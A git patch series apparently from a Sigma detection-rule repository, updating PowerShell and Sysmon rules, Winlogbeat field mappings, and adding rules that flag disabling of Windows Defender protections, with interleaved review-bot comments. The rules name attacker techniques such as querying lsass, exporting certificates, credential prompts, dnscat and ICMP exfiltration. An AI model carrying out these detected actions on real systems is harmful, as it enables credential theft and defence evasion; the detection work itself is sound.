+++ b/rules/windows/powershell/powershell_create_local_user.yml @@ -13,15 +13,15 @@ tags: - attack.t1136 # an old one author: '@ROxPinTeddy' date: 2020/04/11 -modified: 2020/08/24 +modified: 2021/08/04 logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 - Message|contains: - - 'New-LocalUser' + ScriptBlockText|contains: 'New-LocalUser' condition: selection falsepositives: - Legitimate user creation diff --git a/rules/windows/powershell/powershell_decompress_commands.yml b/rules/windows/powershell/powershell_decompress_commands.yml index e5c17ef9..bdef59f8 100644 --- a/rules/windows/powershell/powershell_decompress_commands.yml +++ b/rules/windows/powershell/powershell_decompress_commands.yml @@ -13,6 +13,7 @@ references: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_dnscat_execution.yml index 950bea72..63a590f3 100644 --- a/rules/windows/powershell/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_dnscat_execution.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_get_clipboard.yml b/rules/windows/powershell/powershell_get_clipboard.yml index 46e8374c..26282f89 100644 --- a/rules/windows/powershell/powershell_get_clipboard.yml +++ b/rules/windows/powershell/powershell_get_clipboard.yml @@ -13,6 +13,7 @@ references: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection1: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_icmp_exfiltration.yml index 373f679a..c6e83568 100644 --- a/rules/windows/powershell/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_icmp_exfiltration.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml index 7d9b4abc..8438323a 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_clip+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml index 0dea2bd5..dd5771b8 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_obfuscated_iex.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml index 7e2b0ef2..f1969a38 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_stdin+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml index 9c2ab871..61e5ee7e 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_var+.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml index 365149a5..8fde7bb9 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_compress.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml index 793dc3c1..e26c5a29 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_rundll.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml index ab358c64..5b638d94 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml index 5f514bc6..5adbdedc 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_clip.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml index 45764546..07f71af3 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_mhsta.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml index a0abb761..cc5e50e6 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_use_rundll32.yml @@ -14,6 +14,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml index 0dcbf692..f1d98861 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_var++.yml 
@@ -15,6 +15,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_prompt_credentials.yml b/rules/windows/powershell/powershell_prompt_credentials.yml index 4513b1dd..8ef73b44 100644 --- a/rules/windows/powershell/powershell_prompt_credentials.yml +++ b/rules/windows/powershell/powershell_prompt_credentials.yml @@ -12,6 +12,7 @@ tags: - attack.t1086 # an old one author: John Lambert (idea), Florian Roth (rule) date: 2017/04/09 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -20,8 +21,7 @@ detection: selection: EventID: 4104 keyword: - Message|contains: - - 'PromptForCredential' + ScriptBlockText|contains: 'PromptForCredential' condition: all of them falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml index ac4077fd..6f1dfeba 100644 --- a/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml +++ b/rules/windows/powershell/powershell_suspicious_export_pfxcertificate.yml @@ -10,6 +10,7 @@ tags: - attack.t1552.004 author: Florian Roth date: 2021/04/23 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -17,8 +18,7 @@ logsource: detection: keywords: EventID: 4104 - ScriptBlockText|contains: - - "Export-PfxCertificate" + ScriptBlockText|contains: "Export-PfxCertificate" condition: keywords falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) diff --git a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml index cb8754e2..c08f0ca5 100644 --- a/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml 
+++ b/rules/windows/powershell/powershell_suspicious_getprocess_lsass.yml @@ -9,6 +9,7 @@ tags: - attack.t1003.001 author: Florian Roth date: 2021/04/23 +modified: 2021/08/04 logsource: product: windows service: powershell @@ -16,8 +17,7 @@ logsource: detection: keywords: EventID: 4104 - ScriptBlockText|contains: - - 'Get-Process lsass' + ScriptBlockText|contains: 'Get-Process lsass' condition: keywords falsepositives: - Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable) diff --git a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml index f0ca3127..c040e3a5 100644 --- a/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml +++ b/rules/windows/powershell/powershell_suspicious_mounted_share_deletion.yml @@ -12,6 +12,7 @@ tags: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/win_powershell_web_request.yml b/rules/windows/powershell/win_powershell_web_request.yml index bde82f4b..37e172c9 100644 --- a/rules/windows/powershell/win_powershell_web_request.yml +++ b/rules/windows/powershell/win_powershell_web_request.yml @@ -35,6 +35,7 @@ detection: logsource: product: windows service: powershell + definition: 'Script block logging must be enabled' detection: selection: EventID: 4104 From 21228a21c78a6e45f6dcbd414c2ea23fa9f3a918 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:09:02 +0200 Subject: [PATCH 0166/1367] update SYSMON Hashes --- tools/config/winlogbeat-modules-enabled.yml | 21 +++++++++++++++++++-- 1 file changed, 19 insertions(+), 2 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index eb3bf37c..4b05f3d5 100644 --- a/tools/config/winlogbeat-modules-enabled.yml 
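Review bot: powershell_suspicious_getprocess_lsass.yml keeps `falsepositives: - Legitimate certificate exports invoked by administrators or users ...`, text that belongs to the Export-PfxCertificate rule edited just above and is wrong for a `Get-Process lsass` detection; since this commit already touches the rule, replace it with something like `- Administrators or monitoring scripts that query lsass via Get-Process`. The `ScriptBlockText|contains: 'Get-Process lsass'` string also requires exactly one space and misses `Get-Process -Name lsass` and `gps lsass`, which is worth either a second entry or a note in the description.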
+++ b/tools/config/winlogbeat-modules-enabled.yml @@ -146,7 +146,6 @@ fieldmappings: Image: process.executable ImageLoaded: file.path ImagePath: winlog.event_data.ImagePath - Imphash: process.pe.imphash IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength @@ -265,7 +264,6 @@ fieldmappings: SamAccountName: winlog.event_data.SamAccountName Service: winlog.event_data.Service ServicePrincipalNames: winlog.event_data.ServicePrincipalNames - sha1: hash.sha1 SidHistory: winlog.event_data.SidHistory Signed: winlog.event_data.Signed SourceAddress: source.ip @@ -279,3 +277,22 @@ fieldmappings: # UserName => smbclient-security eventid:31017 UserName: winlog.event_data.UserName Workstation: winlog.event_data.Workstation + # SYSMON Hashes + Hashes: winlog.event_data.Hashes + # extraction from Hashes NOT a original field but find in some rule + md5: + category=driver_load: hash.md5 + category=image_load: file.hash.md5 + default: process.hash.md5 + sha1: + category=driver_load: hash.sha1 + category=image_load: file.hash.sha1 + default: process.hash.sha1 + sha256: + category=driver_load: hash.sha256 + category=image_load: file.hash.sha256 + default: process.hash.sha256 + Imphash: + category=driver_load: hash.imphash + category=image_load: file.hash.imphash + default: process.pe.imphash \ No newline at end of file From 47086d5d7869d9f88a23bc0619ec29fdd1c39ea8 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:12:01 +0200 Subject: [PATCH 0167/1367] fix duplicate --- tools/config/winlogbeat-modules-enabled.yml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 4b05f3d5..b7bbd88c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml 
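Review bot: The new `Imphash` mapping points `category=driver_load` at `hash.imphash` and `category=image_load` at `file.hash.imphash`, but as far as I know ECS has no `imphash` in the `hash.*` field set; imphash lives under `pe.imphash` (`process.pe.imphash`, `file.pe.imphash`), which is also what the retained `default: process.pe.imphash` uses. Unless Winlogbeat's sysmon module really populates `file.hash.imphash`, rules using Imphash on image or driver loads will match nothing; I would use `category=image_load: file.pe.imphash` and confirm the driver_load target against the module's field list. The comment `# extraction from Hashes NOT a original field but find in some rule` is hard to parse; suggest `# md5/sha1/sha256/Imphash are split out of Sysmon's Hashes field by Winlogbeat; some rules reference them directly`.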
@@ -133,13 +133,6 @@ fieldmappings: FailureCode: winlog.event_data.FailureCode FileName: file.path GrantedAccess: winlog.event_data.GrantedAccess - GroupName: - - winlog.event_data.GroupName - - group.name - GroupSid: - - group.id - - winlog.event_data.GroupSid - Hashes: winlog.event_data.Hashes file_hash: winlog.event_data.Hashes HiveName: winlog.event_data.HiveName HostVersion: winlog.event_data.HostVersion From 481cd9aca19fff64caa5ff30642d06e3c58d942f Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 4 Aug 2021 15:46:05 +0200 Subject: [PATCH 0168/1367] add security 7045 --- tools/config/winlogbeat-modules-enabled.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index b7bbd88c..e164ff6c 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -138,7 +138,6 @@ fieldmappings: HostVersion: winlog.event_data.HostVersion Image: process.executable ImageLoaded: file.path - ImagePath: winlog.event_data.ImagePath IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength @@ -162,7 +161,6 @@ fieldmappings: ScriptBlockText: powershell.file.script_block_text SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName - ServiceName: winlog.event_data.ServiceName ShareName: winlog.event_data.ShareName Signature: winlog.event_data.Signature Source: winlog.event_data.Source @@ -288,4 +286,11 @@ fieldmappings: Imphash: category=driver_load: hash.imphash category=image_load: file.hash.imphash - default: process.pe.imphash \ No newline at end of file + default: process.pe.imphash + #security 7045 + ServiceName: + service=security: winlog.event_data.ServiceName + default: service.name + ImagePath: winlog.event_data.ImagePath + ServiceType: winlog.event_data.ServiceType + StartType: winlog.event_data.ServiceStartType 
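Review bot: The `#security 7045` comment on the appended `ServiceName` mapping is misleading: 7045 (service installed) is a System-log event from the Service Control Manager, while the Security-log counterpart is 4697, and it is that `service=security` branch that keeps `winlog.event_data.ServiceName`. The new `default: service.name` therefore applies to 7045 rules that previously resolved to `winlog.event_data.ServiceName`; unless Winlogbeat populates `service.name` for 7045, those rules silently stop matching, so please verify against an actual 7045 document. I would change the comment to `# Security 4697 keeps event_data.ServiceName; other sources (e.g. System 7045) use service.name`.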
From 882ea7ec2258df208c8f93867bb2188ddc806b79 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 4 Aug 2021 15:50:39 +0200 Subject: [PATCH 0169/1367] fix: remove unnecessary single value list --- .../process_access/sysmon_direct_syscall_ntopenprocess.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml index 05865dff..433cc150 100755 --- a/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml +++ b/rules/windows/process_access/sysmon_direct_syscall_ntopenprocess.yml @@ -11,8 +11,7 @@ logsource: product: windows detection: selection: - CallTrace|startswith: - - 'UNKNOWN' + CallTrace|startswith: 'UNKNOWN' condition: selection falsepositives: - unkown From f89ba18c5dc7ba1f908e0db3e29484dd308f0f9c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 11:27:41 -0500 Subject: [PATCH 0170/1367] Create sysmon_disabled_pua_protection_on_microsoft_defender.yml --- ...d_pua_protection_on_microsoft_defender.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml new file mode 100644 index 00000000..6cda0a7f --- /dev/null +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml 
@@ -0,0 +1,24 @@ +title: Disable PUA Protection on Windows Defender +id: 8ffc5407-52e3-478f-9596-0a7371eafe13 +description: Detects disabling Windows Defender PUA protection +status: experimental +date: 2021/08/04 +author: Austin Songer @austinsonger +references: + - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html +tags: + - attack.defense_evasion +logsource: + category: registry_event + product: windows +detection: + selection: + EventType: SetValue + TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' + TargetObject|endswith: + - PUAProtection + Details: 'DWORD (0x00000000)' + condition: selection +falsepositives: + - Unknown +level: high From bae075713c101525a6b445fd72fc63d5b7a34457 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 13:10:37 -0500 Subject: [PATCH 0171/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- ...smon_disabled_pua_protection_on_microsoft_defender.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index 6cda0a7f..e79e6055 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml 
@@ -10,15 +10,13 @@ tags: - attack.defense_evasion logsource: category: registry_event - product: windows + product: windows detection: selection: EventType: SetValue - TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' - TargetObject|endswith: - - PUAProtection + TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' Details: 'DWORD (0x00000000)' - condition: selection + condition: selection falsepositives: - Unknown level: high From 8d195bf5d57f8816035fb896af16b7f259b45860 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 13:11:31 -0500 Subject: [PATCH 0172/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- .../sysmon_disabled_pua_protection_on_microsoft_defender.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index e79e6055..7486226a 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -14,7 +14,7 @@ logsource: detection: selection: EventType: SetValue - TargetObject|contains: 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' + TargetObject|contains: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\PUAProtection' Details: 'DWORD (0x00000000)' condition: selection falsepositives: From 6a2663a3ae533e1e47b3e2ea8df72870537cf10e Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 17:00:34 -0500 Subject: [PATCH 0173/1367] Update sysmon_disabled_pua_protection_on_microsoft_defender.yml --- .../sysmon_disabled_pua_protection_on_microsoft_defender.yml | 1 + 1 file changed, 1 insertion(+) 
diff --git a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml index 7486226a..f0ad69f8 100644 --- a/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml +++ b/rules/windows/registry_event/sysmon_disabled_pua_protection_on_microsoft_defender.yml @@ -8,6 +8,7 @@ references: - https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html tags: - attack.defense_evasion + - attack.t1562.001 logsource: category: registry_event product: windows From ff7fb4e4d226fa2062a305ac3a73d5bb8f8e7b89 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 19:08:10 -0500 Subject: [PATCH 0174/1367] Create sysmon_disabled_tamper_protection_on_microsoft_defender.yml --- ...amper_protection_on_microsoft_defender.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml diff --git a/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml new file mode 100644 index 00000000..5b8a2d00 --- /dev/null +++ b/rules/windows/registry_event/sysmon_disabled_tamper_protection_on_microsoft_defender.yml 
@@ -0,0 +1,23 @@
+title: Disable Tamper Protection on Windows Defender
+id: 93d298a1-d28f-47f1-a468-d971e7796679
+description: Detects disabling Windows Defender Tamper Protection
+status: experimental
+date: 2021/08/04
+author: Austin Songer @austinsonger
+references:
+ - https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ EventType: SetValue
+ TargetObject|contains: 'HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection'
+ Details: 'DWORD (0)'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
From 483dacb209232e38d8a1e2ac3d80598ab61cf26c Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Wed, 4 Aug 2021 19:11:00 -0500 Subject: [PATCH 0175/1367] Create sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml --- ...twork_protection_on_microsoft_defender.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml
diff --git a/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml b/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml
new file mode 100644
index 00000000..05d71751
--- /dev/null
+++ b/rules/windows/registry_event/sysmon_disabled_exploit_guard_network_protection_on_microsoft_defender.yml
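Review bot: `Details: 'DWORD (0)'` does not match the form Sysmon writes for DWORD registry data, which is `DWORD (0x00000000)` as the PUA rule earlier in this series uses, so an exact match on this string should never fire. Change it to `Details: 'DWORD (0x00000000)'` to be consistent with the other registry_event rules. A `falsepositives` entry more specific than `Unknown` would also help here, e.g. noting whether toggling the setting through the Windows Security UI writes this same value; I cannot confirm that from the rule alone.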
@@ -0,0 +1,23 @@
+title: Disable Exploit Guard Network Protection on Windows Defender
+id: bf9e1387-b040-4393-9851-1598f8ecfae9
+description: Detects disabling Windows Defender Exploit Guard Network Protection
+status: experimental
+date: 2021/08/04
+author: Austin Songer @austinsonger
+references:
+ - https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html
+tags:
+ - attack.defense_evasion
+ - attack.t1562.001
+logsource:
+ category: registry_event
+ product: windows
+detection:
+ selection:
+ EventType: SetValue
+ TargetObject|contains: 'HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection\DisallowExploitProtectionOverride'
+ Details: 'DWORD (00000001)'
+ condition: selection
+falsepositives:
+ - Unknown
+level: medium
From 1d1b58d712e03160a9e566b4dcbd49ffbecb5e9b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 5 Aug 2021 10:54:58 +0200 Subject: [PATCH 0176/1367] add sysmon mapping --- tools/config/generic/sysmon.yml | 5 +- tools/config/winlogbeat-modules-enabled.yml | 199 +++++++++++++------- 2 files changed, 138 insertions(+), 66 deletions(-)
diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml
index 46d3c39b..a5aaac02 100644
--- a/tools/config/generic/sysmon.yml
+++ b/tools/config/generic/sysmon.yml
@@ -167,4 +167,7 @@ logsources: category: sysmon_error product: windows conditions:
- EventID: 255
\ No newline at end of file
+ EventID: 255
+ rewrite:
+ product: windows
+ service: sysmon
\ No newline at end of file
diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml
index e164ff6c..9a6ba374 100644
--- a/tools/config/winlogbeat-modules-enabled.yml
+++ b/tools/config/winlogbeat-modules-enabled.yml
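Review bot: The title and description name Exploit Guard Network Protection, but the selection matches `DisallowExploitProtectionOverride` under `Windows Defender Security Center\App and Browser protection`, which is the Security Center policy governing whether users may change Exploit Protection settings, and the cited tenforums reference is likewise about Exploit Protection settings. As far as I know, writing 1 to that value locks the settings rather than disabling any protection, so the rule as written would fire on a hardening action; please confirm the policy semantics against Microsoft's documentation and either retitle the rule or point it at the Network Protection policy under `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection` (value name to be verified against that documentation). Separately, `Details: 'DWORD (00000001)'` lacks the `0x` prefix Sysmon emits; the matching form is `Details: 'DWORD (0x00000001)'`.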
@@ -114,30 +114,12 @@ fieldmappings: AuditPolicyChanges: winlog.event_data.AuditPolicyChanges AuthenticationPackageName: winlog.event_data.AuthenticationPackageName CallingProcessName: winlog.event_data.CallingProcessName - CallTrace: winlog.event_data.CallTrace Channel: winlog.channel - CommandLine: process.command_line ComputerName: winlog.ComputerName - CurrentDirectory: process.working_directory - Description: winlog.event_data.Description - DestinationHostname: destination.domain - DestinationIp: destination.ip - dst_ip: destination.ip - #DestinationIsIpv6: winlog.event_data.DestinationIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 - DestinationPort: destination.port - dst_port: destination.port - DestinationPortName: network.protocol - Details: winlog.event_data.Details - EngineVersion: winlog.event_data.EngineVersion EventType: winlog.event_data.EventType FailureCode: winlog.event_data.FailureCode FileName: file.path - GrantedAccess: winlog.event_data.GrantedAccess - file_hash: winlog.event_data.Hashes HiveName: winlog.event_data.HiveName - HostVersion: winlog.event_data.HostVersion - Image: process.executable - ImageLoaded: file.path IpAddress: source.ip IpPort: source.port KeyLength: winlog.event_data.KeyLength 
@@ -148,44 +130,24 @@ fieldmappings: ObjectName: winlog.event_data.ObjectName ObjectType: winlog.event_data.ObjectType ObjectValueName: winlog.event_data.ObjectValueName - ParentCommandLine: process.parent.command_line ParentProcessName: process.parent.name - ParentImage: process.parent.executable Path: winlog.event_data.Path - PipeName: file.name ProcessCommandLine: winlog.event_data.ProcessCommandLine ProcessName: process.executable - Product: winlog.event_data.Product Properties: winlog.event_data.Properties - RuleName: winlog.event_data.RuleName - ScriptBlockText: powershell.file.script_block_text SecurityID: winlog.event_data.SecurityID ServiceFileName: winlog.event_data.ServiceFileName ShareName: winlog.event_data.ShareName - Signature: winlog.event_data.Signature Source: winlog.event_data.Source - SourceHostname: source.domain - SourceImage: process.executable - SourceIp: source.ip - src_ip: source.ip - SourcePort: source.port - src_port: source.port - #SourceIsIpv6: winlog.event_data.SourceIsIpv6 #=gets deleted and not boolean...https://github.com/elastic/beats/blob/71eee76e7cfb8d5b18dfacad64864370ddb14ce7/x-pack/winlogbeat/module/sysmon/config/winlogbeat-sysmon.js#L278-L279 - StartModule: winlog.event_data.StartModule - State: winlog.event_data.State Status: winlog.event_data.Status SubjectDomainName: user.domain SubjectUserName: user.name SubjectUserSid: user.id - TargetFilename: file.path - TargetImage: winlog.event_data.TargetImage - TargetObject: registry.path TicketEncryptionType: winlog.event_data.TicketEncryptionType TicketOptions: winlog.event_data.TicketOptions TargetDomainName: user.domain TargetUserName: user.name TargetUserSid: user.id - User: user.name WorkstationName: source.domain # Channel: WLAN-Autoconfig AND EventID: 8001 AuthenticationAlgorithm: winlog.event_data.AuthenticationAlgorithm 
@@ -200,17 +162,6 @@ fieldmappings: PHYType: winlog.event_data.PHYType ProfileName: winlog.event_data.ProfileName SSID: winlog.event_data.SSID - # powershell - SequenceNumber: event.sequence - NewEngineState: powershell.engine.new_state - PreviousEngineState: powershell.engine.previous_state - NewProviderState: powershell.provider.new_state - ProviderName: powershell.provider.name - HostId: process.entity_id - HostApplication: process.command_line - HostName: process.title - Payload: winlog.event_data.Payload - ContextInfo: winlog.event_data.ContextInfo # from here missing field at 20210706 Accesses: winlog.event_data.Accesses AccessList: winlog.event_data.AccessList 
